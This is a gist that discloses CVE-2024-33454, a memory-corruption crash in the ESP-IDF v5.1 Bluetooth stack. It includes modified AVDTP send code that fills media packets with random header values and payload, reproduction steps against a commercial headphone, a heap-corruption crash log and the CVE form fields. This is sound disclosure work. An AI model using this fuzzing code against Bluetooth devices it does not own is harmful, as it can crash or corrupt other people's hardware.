Skip to content

Instantly share code, notes, and snippets.

@Zakary-D
Last active May 10, 2024 01:41
Show Gist options
  • Save Zakary-D/30f565c4266c02c62aa9089c363e78e9 to your computer and use it in GitHub Desktop.
Save Zakary-D/30f565c4266c02c62aa9089c363e78e9 to your computer and use it in GitHub Desktop.
CVE-2024-33454 Guru Meditation Error and rebooting when using ESP32 bluetooth
CVE-2024-33454
IDF version.
v5.1.3-416-gd23b7a0361
Espressif SoC revision.
ESP32D0WDQ5(revision 3)
Operating System used.
Linux
How did you build your project?
Command line with idf.py
If you are using Windows, please specify command line type.
None
Development Kit.
ESP-WROVER-KIT
Power Supply used.
USB
What is the expected behavior?
send modified AVDTP packet to peer.
What is the actual behavior?
memory corruption and rebooting
Steps to reproduce.
1.modify code: esp-idf/components/bt/host/bluedroid/stack/avdt/avdt_ad.c
UINT8 avdt_ad_write_req(UINT8 type, tAVDT_CCB *p_ccb, tAVDT_SCB *p_scb, BT_HDR *p_buf)
{
UINT8 tcid;
/* get tcid from type, scb */
tcid = avdt_ad_type_to_tcid(type, p_scb);
srand(time(NULL));
// p_buf[0].event = (uint16_t)rand();
if(type == AVDT_CHAN_MEDIA){
p_buf->event = (uint16_t)rand();
p_buf->len = (uint16_t)rand() % 255;
p_buf->offset = (uint16_t)rand();
p_buf->layer_specific = (uint16_t)rand();
for(int i = 0; i < p_buf->len; ++i) p_buf->data[i] = (uint16_t)rand();
}
static int dk_cnt = 0;
if(++dk_cnt % 1000 == 0){
dk_cnt = 0, printf("\n\n avdt_ad_write_req \n");
printf("%" PRIu16 " ", p_buf->event);
printf("%" PRIu16 " ", p_buf->len);
printf("%" PRIu16 " ", p_buf->offset);
printf("%" PRIu16 " \n", p_buf->layer_specific);
for(int i = 0; i < p_buf->len; ++i) printf("%" PRIu16 " ", p_buf->data[i]);
printf("\n\n");
}
return L2CA_DataWrite(avdt_cb.ad.rt_tbl[avdt_ccb_to_idx(p_ccb)][tcid].lcid, p_buf);
}
change the target device name of example/a2dp_source to my headphone: HUAWEI FreeBuds 4i
use idf.py to build example/a2dp_source
4.flash it to ESP-WROVER-KIT and monitor it
5.about half an hour later, something get wrong and the development board rebooting
Debug Logs.
Guru Meditation Error: Core 0 panic'ed (StoreProhibited). Exception was unhandled.
Core 0 register dump:
PC : 0x40093232 PS : 0x00060333 A0 : 0x80092e87 A1 : 0x3ffd0350
0x40093232: remove_free_block at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:332
(inlined by) block_remove at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:380
(inlined by) block_merge_next at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:486
(inlined by) tlsf_free at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:1123
A2 : 0x3ffcc144 A3 : 0x3ffd7838 A4 : 0x3ffd7830 A5 : 0x3ffc0042
A6 : 0x00000028 A7 : 0x00000058 A8 : 0x00000018 A9 : 0x3ffd8844
A10 : 0x3ffd8844 A11 : 0x00000000 A12 : 0x0099009d A13 : 0x00000004
A14 : 0xb33fffff A15 : 0xb33fffff SAR : 0x0000001c EXCCAUSE: 0x0000001d
EXCVADDR: 0x009900a9 LBEG : 0x4000c2e0 LEND : 0x4000c2f6 LCOUNT : 0xffffffff
0x4000c2e0: memcpy in ROM
0x4000c2f6: memcpy in ROM
Backtrace: 0x4009322f:0x3ffd0350 0x40092e84:0x3ffd0370 0x40082362:0x3ffd0390 0x4009406d:0x3ffd03b0 0x400de242:0x3ffd03d0 0x400df122:0x3ffd03f0 0x400de459:0x3ffd0410 0x4010c2fa:0x3ffd0430 0x400de4b5:0x3ffd0450 0x4010d2ce:0x3ffd0470 0x4010d19a:0x3ffd0490 0x40090ad5:0x3ffd04c0
0x4009322f: remove_free_block at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:331
(inlined by) block_remove at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:380
(inlined by) block_merge_next at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:486
(inlined by) tlsf_free at /root/esp/esp-idf/components/heap/tlsf/tlsf.c:1123
0x40092e84: multi_heap_free_impl at /root/esp/esp-idf/components/heap/multi_heap.c:231
0x40082362: heap_caps_free at /root/esp/esp-idf/components/heap/heap_caps.c:388
0x4009406d: free at /root/esp/esp-idf/components/newlib/heap.c:39
0x400de242: transmit_fragment at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:350
0x400df122: fragment_and_dispatch at /root/esp/esp-idf/components/bt/host/bluedroid/hci/packet_fragmenter.c:132
0x400de459: event_packet_ready at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:338
0x4010c2fa: fixed_queue_process at /root/esp/esp-idf/components/bt/common/osi/fixed_queue.c:254
0x400de4b5: hci_downstream_data_handler at /root/esp/esp-idf/components/bt/host/bluedroid/hci/hci_layer.c:238
0x4010d2ce: osi_thread_generic_event_handler at /root/esp/esp-idf/components/bt/common/osi/thread.c:425
0x4010d19a: osi_thread_run at /root/esp/esp-idf/components/bt/common/osi/thread.c:165 (discriminator 1)
0x40090ad5: vPortTaskWrapper at /root/esp/esp-idf/components/freertos/FreeRTOS-Kernel/portable/xtensa/port.c:162
ELF file SHA256: fb53a7e2e55ccb03
Rebooting...
ets Jul 29 2019 12:21:46
CVE-2024-33454 was assigned to this issue.
> ------------------------------------------
>
> [Vulnerability Type]
> Buffer Overflow
>
> ------------------------------------------
>
> [Vendor of Product]
> https://github.com/espressif/esp-idf/tree/release/v5.1
>
> ------------------------------------------
>
> [Affected Product Code Base]
> esp-idf - v5.1
>
> ------------------------------------------
>
> [Affected Component]
> Bluetooth stack of esp-idf5.1,memory corruption due to missing bounds checking(exp:https://www.esp32.com/viewtopic.php?f=14&t=39478)
>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment